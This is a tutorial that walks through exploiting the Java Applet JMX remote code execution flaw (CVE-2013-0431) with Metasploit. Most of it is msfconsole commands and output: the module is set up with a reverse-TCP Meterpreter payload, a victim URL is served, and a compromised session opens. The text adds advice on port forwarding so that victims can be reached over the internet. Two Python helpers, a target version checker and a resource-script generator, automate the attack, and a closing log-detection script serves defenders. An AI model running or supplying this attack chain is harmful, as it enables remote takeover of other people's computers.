Java Applet JMX Remote Code Execution

Java exploits are client-side exploits: they target the Java browser plugin in order to run arbitrary commands on the visitor's system. The exploit is hosted on a web page in the form of a Java applet. When the victim visits the URL and the applet is allowed to run, the Java Runtime Environment (JRE) is exploited to escape the applet sandbox and execute arbitrary commands on the system, giving the attacker control.
The "JMX Remote Code Execution" exploit is a recent one that was exploited heavily in the wild in February 2013 (it is tracked as CVE-2013-0431). It abuses the JMX classes from within a Java applet. The vulnerability is present in Oracle (formerly Sun) Java JRE 7 up to and including Update 11 and was patched in the February 2013 Critical Patch Update (7 Update 13). Because it is a pure Java logic flaw rather than a memory-corruption bug, it is a generic JRE exploit: no shellcode, ROP or ASLR/DEP bypass is involved, so it works against any OS and any browser that is running a vulnerable JRE version.
Proof-of-concept code for the exploit has been posted here.
Exploit with metasploit
Search for the Java browser exploits:
msf > search exploit java multi browser

Matching Modules
================

   Name                                                                   Disclosure Date          Rank       Description
   ----                                                                   ---------------          ----       -----------
   exploit/multi/browser/firefox_escape_retval                            2009-07-13 00:00:00 UTC  normal     Firefox 3.5 escape() Return Value Memory Corruption
   exploit/multi/browser/firefox_xpi_bootstrapped_addon                   2007-06-27 00:00:00 UTC  excellent  Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
   exploit/multi/browser/java_atomicreferencearray                        2012-02-14 00:00:00 UTC  excellent  Java AtomicReferenceArray Type Violation Vulnerability
   exploit/multi/browser/java_calendar_deserialize                        2008-12-03 00:00:00 UTC  excellent  Sun Java Calendar Deserialization Privilege Escalation
   exploit/multi/browser/java_getsoundbank_bof                            2009-11-04 00:00:00 UTC  great      Sun Java JRE getSoundbank file:// URI Buffer Overflow
   exploit/multi/browser/java_jre17_exec                                  2012-08-26 00:00:00 UTC  excellent  Java 7 Applet Remote Code Execution
   exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl   2012-10-16 00:00:00 UTC  excellent  Java Applet AverageRangeStatisticImpl Remote Code Execution
   exploit/multi/browser/java_jre17_jaxws                                 2012-10-16 00:00:00 UTC  excellent  Java Applet JAX-WS Remote Code Execution
   exploit/multi/browser/java_jre17_jmxbean                               2013-01-10 00:00:00 UTC  excellent  Java Applet JMX Remote Code Execution
   exploit/multi/browser/java_jre17_jmxbean_2                             2013-01-19 00:00:00 UTC  excellent  Java Applet JMX Remote Code Execution
   exploit/multi/browser/java_jre17_method_handle                         2012-10-16 00:00:00 UTC  excellent  Java Applet Method Handle Remote Code Execution
   exploit/multi/browser/java_rhino                                       2011-10-18 00:00:00 UTC  excellent  Java Applet Rhino Script Engine Remote Code Execution
   exploit/multi/browser/java_rmi_connection_impl                         2010-03-31 00:00:00 UTC  excellent  Java RMIConnectionImpl Deserialization Privilege Escalation
   exploit/multi/browser/java_setdifficm_bof                              2009-11-04 00:00:00 UTC  great      Sun Java JRE AWT setDiffICM Buffer Overflow
   exploit/multi/browser/java_signed_applet                               1997-02-19 00:00:00 UTC  excellent  Java Signed Applet Social Engineering Code Execution
   exploit/multi/browser/java_trusted_chain                               2010-03-31 00:00:00 UTC  excellent  Java Statement.invoke() Trusted Method Chain Privilege Escalation
   exploit/multi/browser/java_verifier_field_access                       2012-06-06 00:00:00 UTC  excellent  Java Applet Field Bytecode Verifier Cache Remote Code Execution
   exploit/multi/browser/mozilla_navigatorjava                            2006-07-25 00:00:00 UTC  normal     Mozilla Suite/Firefox Navigator Object Code Execution
   exploit/multi/browser/qtjava_pointer                                   2007-04-23 00:00:00 UTC  excellent  Apple QTJava toQTPointer() Arbitrary Memory Access
   exploit/multi/misc/batik_svg_java                                      2012-05-11 00:00:00 UTC  excellent  Squiggle 1.7 SVG Browser Java Code Execution
   exploit/windows/browser/imgeviewer_tifmergemultifiles                  2010-03-03 00:00:00 UTC  normal     Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control
   exploit/windows/browser/java_docbase_bof                               2010-10-12 00:00:00 UTC  great      Sun Java Runtime New Plugin docbase Buffer Overflow
   exploit/windows/browser/ms05_054_onload                                2005-11-21 00:00:00 UTC  normal     MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
   exploit/windows/browser/teechart_pro                                   2011-08-11 00:00:00 UTC  normal     TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference
The exploit we want is this one (java_jre17_jmxbean is the earlier January 2013 JMX bug; the _2 module is the one exploited in February):
exploit/multi/browser/java_jre17_jmxbean_2
Use the info command to get its description:
This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.
Setup a vulnerable system
To test this exploit we need a vulnerable system. For this I have set up Windows XP with Java JRE 7 Update 10 (the installer is named jre-7u10-windows-i586.exe). Note that this exploit will not work on Java 6; it works only on Java 7 up to and including Update 11, so do not let the installer or the Java control panel auto-update the test machine, or the exploit will stop working. Older JRE releases can be downloaded from Oracle's Java SE archive.
Any browser with the Java plugin enabled should work; the exploit does not depend on the browser.
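Before spending time on a target it is worth confirming that its JRE really falls in the affected range. The Python below is an added example, not code from the original post or from Metasploit: it parses the first line of `java -version` output (the sample banners are constructed, not captured from the test machine) and applies the range given above, Java 7 up to and including Update 11. The optional `check_local_jre` helper runs `java -version` on the machine it is executed on when a `java` binary is on the path; note that `java -version` prints its banner on stderr.

```python
import re
import subprocess
from typing import Optional, Tuple

# Affected range stated on this page: JRE 7, Update 0 through Update 11 inclusive.
AFFECTED_MAJOR = 7
LAST_AFFECTED_UPDATE = 11

# First line of `java -version`, e.g.  java version "1.7.0_10"  /  openjdk version "11.0.2" 2019-01-15
BANNER_RE = re.compile(r'(?:java|openjdk) version "(?P<ver>[^"]+)"')
# Legacy 1.x.y_UU scheme (Java 5 to 8) and the 9+ scheme (MAJOR.MINOR.SECURITY)
NUMERIC_RE = re.compile(r'^(\d+)\.(\d+)\.(\d+)(?:_(\d+))?')


def parse_java_version(banner: str) -> Optional[Tuple[int, int]]:
    """Return (major, update) from `java -version` output, or None if no version line is found.

    '1.7.0_10'  -> (7, 10)   legacy scheme: the major is the second field
    '1.7.0'     -> (7, 0)    no update suffix means the GA release
    '11.0.2'    -> (11, 0)   Java 9+ has no update field
    """
    m = BANNER_RE.search(banner)
    if not m:
        return None
    n = NUMERIC_RE.match(m.group("ver"))
    if not n:
        return None
    first, second, _third, update = n.groups()
    major = int(second) if first == "1" else int(first)
    return major, int(update or 0)


def affected_by_jmxbean2(banner: str) -> bool:
    """True when the banner describes a JRE inside the range this page gives for the exploit."""
    parsed = parse_java_version(banner)
    if parsed is None:
        return False  # unknown version: do not claim it is exploitable
    major, update = parsed
    return major == AFFECTED_MAJOR and update <= LAST_AFFECTED_UPDATE


def check_local_jre(java_cmd: str = "java") -> Optional[bool]:
    """Run `java -version` locally and classify it; None if java is missing or does not run."""
    try:
        proc = subprocess.run([java_cmd, "-version"], capture_output=True, text=True, timeout=15)
    except (OSError, subprocess.TimeoutExpired):
        return None
    # the banner goes to stderr, so look at both streams
    return affected_by_jmxbean2(proc.stderr + proc.stdout)


# Constructed sample banners (assumed layouts, not output captured from the page's test machine)
SAMPLES = {
    "7u10 as used on this page": 'java version "1.7.0_10"\nJava(TM) SE Runtime Environment',
    "7u11, last affected": 'java version "1.7.0_11"\nJava(TM) SE Runtime Environment',
    "7u13, patched": 'java version "1.7.0_13"',
    "6u45, not affected": 'java version "1.6.0_45"',
    "OpenJDK 11": 'openjdk version "11.0.2" 2019-01-15',
}

if __name__ == "__main__":
    for label, banner in SAMPLES.items():
        print(f"{label:28} -> {parse_java_version(banner)}  affected={affected_by_jmxbean2(banner)}")
    print("local JRE affected:", check_local_jre())
```

The parser deliberately answers False for anything it cannot read: a check that errs toward "not vulnerable" is the right default for a script that decides whether to fire an exploit, while a patch-audit script would invert that.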
Select exploit
msf > use exploit/multi/browser/java_jre17_jmxbean_2
Check the options:
msf exploit(java_jre17_jmxbean_2) > show options

Module options (exploit/multi/browser/java_jre17_jmxbean_2):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_jre17_jmxbean_2) >
SRVHOST and SRVPORT are the address and port on which Metasploit runs the web server that serves the exploit page and the applet JAR. Ideally SRVPORT would be 80, so that no port number has to appear in the URL (binding to port 80 requires root); in this case we keep 8080. SRVHOST can be left at 0.0.0.0, which means the server listens on every interface of the local machine. Set URIPATH to / so that the URL is short (by default it is a random string):
msf exploit(java_jre17_jmxbean_2) > set URIPATH /
Select payload
Next, check which payloads are compatible with this exploit:
msf exploit(java_jre17_jmxbean_2) > show payloads

Compatible Payloads
===================

   Name                            Disclosure Date  Rank    Description
   ----                            ---------------  ----    -----------
   generic/custom                                   normal  Custom Payload
   generic/shell_bind_tcp                           normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                        normal  Generic Command Shell, Reverse TCP Inline
   java/meterpreter/bind_tcp                        normal  Java Meterpreter, Java Bind TCP Stager
   java/meterpreter/reverse_http                    normal  Java Meterpreter, Java Reverse HTTP Stager
   java/meterpreter/reverse_https                   normal  Java Meterpreter, Java Reverse HTTPS Stager
   java/meterpreter/reverse_tcp                     normal  Java Meterpreter, Java Reverse TCP Stager
   java/shell/bind_tcp                              normal  Command Shell, Java Bind TCP Stager
   java/shell/reverse_tcp                           normal  Command Shell, Java Reverse TCP Stager
   java/shell_reverse_tcp                           normal  Java Command Shell, Reverse TCP Inline

msf exploit(java_jre17_jmxbean_2) >
We are going to use java/meterpreter/reverse_tcp. Because the exploit executes arbitrary Java inside the victim's JVM, only Java (and generic) payloads are offered; a reverse connection is preferable to a bind shell because the victim usually sits behind NAT or a host firewall that would block an inbound connection.
msf exploit(java_jre17_jmxbean_2) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_jre17_jmxbean_2) >
Check the options once again:
msf exploit(java_jre17_jmxbean_2) > show options

Module options (exploit/multi/browser/java_jre17_jmxbean_2):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_jre17_jmxbean_2) >
Now the payload options appear in the options list. LHOST and LPORT are the address and port on which the reverse-shell handler listens, and the important point is that the victim machine must be able to reach them: the payload connects out from the victim to LHOST:LPORT. On a local network, LHOST is your LAN IP (for example 192.168.1.33). Over the internet the victim reaches you through your public IP address, so LHOST must be set to that address, and if the attacking machine sits behind a NAT router, port forwarding must be configured for LPORT (and for SRVPORT, since the victim also fetches the exploit page from you) so that incoming connections are delivered to the machine running Metasploit.
msf exploit(java_jre17_jmxbean_2) > set LHOST 192.168.1.33
LHOST => 192.168.1.33
msf exploit(java_jre17_jmxbean_2) > set LPORT 5555
LPORT => 5555
msf exploit(java_jre17_jmxbean_2) >
Now that the options are set correctly, it's time to run the exploit:
msf exploit(java_jre17_jmxbean_2) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.33:5555
[*] Using URL: http://0.0.0.0:8080/
msf exploit(java_jre17_jmxbean_2) >
[*]  Local IP: http://192.168.1.33:8080/
[*] Server started.
Metasploit reports that the reverse handler is listening and that the web server serving the exploit page has started. The "Using URL: http://0.0.0.0:8080/" line is not an address a victim can open; the URL to hand out is the one printed as "Local IP", http://192.168.1.33:8080/. Once the applet loads and runs, the exploit fires and Metasploit receives a Meterpreter session.
So go to the vulnerable test machine and open that URL in a browser.
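The whole sequence from use to exploit is better kept in an msfconsole resource script than retyped for every engagement. The Python below is an added example, not part of the original post or of Metasploit itself: it generates that script from the few values that actually change, rejects settings that can never produce a session (an LHOST of 0.0.0.0 or 127.0.0.1, SRVPORT equal to LPORT, a URIPATH without a leading slash) and derives the URL to give the victim the same way Metasploit's "Local IP" line does. The file name jmxbean2.rc and the default values are this example's own choices; run the result with msfconsole -q -r jmxbean2.rc.

```python
import ipaddress

MODULE = "exploit/multi/browser/java_jre17_jmxbean_2"


def victim_url(lhost, srvhost="0.0.0.0", srvport=8080, uripath="/"):
    """The address the victim must open. SRVHOST 0.0.0.0 binds every interface, so the
    reachable address is LHOST, which is what Metasploit prints as 'Local IP'."""
    host = lhost if ipaddress.ip_address(srvhost).is_unspecified else srvhost
    return "http://%s:%d%s" % (host, srvport, uripath)


def build_resource_script(lhost, lport=5555, srvhost="0.0.0.0", srvport=8080,
                          uripath="/", payload="java/meterpreter/reverse_tcp"):
    """Return the text of a resource script reproducing the setup walked through above.
    Raises ValueError for combinations that cannot yield a session."""
    addr = ipaddress.ip_address(lhost)  # raises ValueError for a string that is not an address
    if addr.is_unspecified or addr.is_loopback:
        raise ValueError("LHOST %s is not reachable from the victim" % lhost)
    for name, port in (("LPORT", lport), ("SRVPORT", srvport)):
        if not 1 <= port <= 65535:
            raise ValueError("%s %r is not a valid TCP port" % (name, port))
    if lport == srvport:
        raise ValueError("SRVPORT and LPORT must differ: both listen on this host")
    if not uripath.startswith("/"):
        raise ValueError("URIPATH must start with /")
    lines = [
        "use %s" % MODULE,
        "set SRVHOST %s" % srvhost,
        "set SRVPORT %d" % srvport,
        "set URIPATH %s" % uripath,
        "set PAYLOAD %s" % payload,
        "set LHOST %s" % lhost,
        "set LPORT %d" % lport,
        "exploit -j",  # -j runs the module as a background job, as the walkthrough's exploit does
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    import sys
    lhost = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.33"  # LAN address used on this page
    script = build_resource_script(lhost)
    with open("jmxbean2.rc", "w") as fh:
        fh.write(script)
    print(script)
    print("send the victim to:", victim_url(lhost))
    print("then run: msfconsole -q -r jmxbean2.rc")
```

Failing fast on a loopback or unspecified LHOST is the useful part: Metasploit will happily start a handler on 127.0.0.1 and the exploit page will be served, but the applet's connect-back will go to the victim's own loopback and the session never appears, which is a confusing way to lose ten minutes.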
Meterpreter
Once the URL is opened, Metasploit serves the HTML page, then the applet JAR, and finally the payload stage to the now-unsandboxed applet; if everything goes well, a Meterpreter session opens:
msf exploit(java_jre17_jmxbean_2) >
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /
[*] 192.168.1.4      java_jre17_jmxbean_2 - Sending HTML
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /favicon.ico
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /lEUioG.jar
[*] 192.168.1.4      java_jre17_jmxbean_2 - Sending JAR
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /lEUioG.jar
[*] 192.168.1.4      java_jre17_jmxbean_2 - Sending JAR
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /java/lang/ClassBeanInfo.class
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /java/lang/ObjectBeanInfo.class
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /java/lang/ObjectCustomizer.class
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /java/lang/ClassCustomizer.class
[*] Sending stage (30246 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.33:5555 -> 192.168.1.4:1065) at 2013-05-16 23:01:46 -0700
The Meterpreter session started successfully. List the sessions and interact with it (note that the command is sessions, plural; the first attempt below is a typo that msfconsole rejects):
msf exploit(java_jre17_jmxbean_2) > sessions -l

Active sessions
===============

  Id  Type                   Information               Connection
  --  ----                   -----------               ----------
  1   meterpreter java/java  enlightened @ ----------  192.168.1.33:5555 -> 192.168.1.4:1065 (192.168.1.4)

msf exploit(java_jre17_jmxbean_2) > session -i 1
[-] Unknown command: session.
msf exploit(java_jre17_jmxbean_2) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > pwd
C:\Program Files\Google\Chrome\Application\26.0.1410.64
We have successfully compromised the victim machine. The session runs inside the victim's Java process with the privileges of the browser user, which is why the working directory is Chrome's installation folder (Chrome 26 on Windows XP). From here, sysinfo and getuid confirm what you have landed on, and everything else is standard Meterpreter post-exploitation. Play with it!
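The request log Metasploit printed above is also exactly what a defender sees in a web proxy or server log. A browser fetching /java/lang/ClassBeanInfo.class and its siblings from a web server is a strong indicator: those classes live inside the JRE itself, and a client asks a remote applet codebase for them only when the JRE, introspecting java.lang.Class and java.lang.Object on the exploit's behalf, fails to find BeanInfo/Customizer classes locally and falls back to the applet's class loader. The Python below is an added example, not part of the original post or of Metasploit: it runs that check over constructed access-log lines in the common Apache/nginx "combined" layout and flags any client that downloaded a JAR and then requested JRE-namespace classes from the same server. The log layout, the sample lines and the second (benign) client are this example's assumptions.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" access log:  client ident user [time] "METHOD path PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)

# Classes that only ever ship inside the JRE (rt.jar). A browser should never fetch them over HTTP.
JRE_CLASS_RE = re.compile(r'^/(?:java|javax|sun|com/sun)/[\w/$]+\.class$')
JAR_RE = re.compile(r'\.jar$', re.IGNORECASE)


def parse_access_log(lines):
    """Yield (client, path, status) for every line that parses; skip the rest."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.group("client"), m.group("path").split("?", 1)[0], int(m.group("status"))


def find_applet_exploit_clients(lines):
    """Map client -> {'jars': [...], 'jre_classes': [...]} for clients that fetched a JAR
    and then asked the server for JRE-namespace classes. Either signal alone is weak:
    legitimate applets download JARs, and a stray 404 for a .class file happens; both
    together, from one client, match the exploit's request pattern."""
    seen = defaultdict(lambda: {"jars": [], "jre_classes": []})
    for client, path, _status in parse_access_log(lines):
        if JAR_RE.search(path):
            seen[client]["jars"].append(path)
        elif JRE_CLASS_RE.match(path):
            seen[client]["jre_classes"].append(path)
    return {c: v for c, v in seen.items() if v["jars"] and v["jre_classes"]}


# Constructed sample log (not a real capture): the first client mirrors the request sequence
# Metasploit printed above; the second is a benign applet fetching classes from its own package path.
SAMPLE_LOG = """\
192.168.1.4 - - [16/May/2013:23:01:40 -0700] "GET / HTTP/1.1" 200 1184 "-" "Mozilla/5.0 (Windows NT 5.1) Chrome/26.0.1410.64"
192.168.1.4 - - [16/May/2013:23:01:40 -0700] "GET /favicon.ico HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 5.1) Chrome/26.0.1410.64"
192.168.1.4 - - [16/May/2013:23:01:41 -0700] "GET /lEUioG.jar HTTP/1.1" 200 6120 "-" "Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_10"
192.168.1.4 - - [16/May/2013:23:01:41 -0700] "GET /java/lang/ClassBeanInfo.class HTTP/1.1" 404 0 "-" "Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_10"
192.168.1.4 - - [16/May/2013:23:01:41 -0700] "GET /java/lang/ObjectBeanInfo.class HTTP/1.1" 404 0 "-" "Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_10"
192.168.1.4 - - [16/May/2013:23:01:41 -0700] "GET /java/lang/ObjectCustomizer.class HTTP/1.1" 404 0 "-" "Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_10"
192.168.1.4 - - [16/May/2013:23:01:41 -0700] "GET /java/lang/ClassCustomizer.class HTTP/1.1" 404 0 "-" "Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_10"
192.168.1.7 - - [16/May/2013:23:05:02 -0700] "GET /charts/index.html HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/20.0"
192.168.1.7 - - [16/May/2013:23:05:03 -0700] "GET /charts/lib/charts.jar HTTP/1.1" 200 91822 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_21"
192.168.1.7 - - [16/May/2013:23:05:03 -0700] "GET /charts/com/example/charts/Theme.class HTTP/1.1" 200 3011 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_21"
garbage line that does not parse
"""

if __name__ == "__main__":
    for client, hits in find_applet_exploit_clients(SAMPLE_LOG.splitlines()).items():
        print(client, "downloaded", hits["jars"], "then requested", hits["jre_classes"])
```

On a real proxy log the status codes are also telling: the attacker's server answers those .class requests with 404 (Metasploit has nothing to serve at that path), so a run of 404s under /java/ from one client right after a JAR download is the shape to alert on.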